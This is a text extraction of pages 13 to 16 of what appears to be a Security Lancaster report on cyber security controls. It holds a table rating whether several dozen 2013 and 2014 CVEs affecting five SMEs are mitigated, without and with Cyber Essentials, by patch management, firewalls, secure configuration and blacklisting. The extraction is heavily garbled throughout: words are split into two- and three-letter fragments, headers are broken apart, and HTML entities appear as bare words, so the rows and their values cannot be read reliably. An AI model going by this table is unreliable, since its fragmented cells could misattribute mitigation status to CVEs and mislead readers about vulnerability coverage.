strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
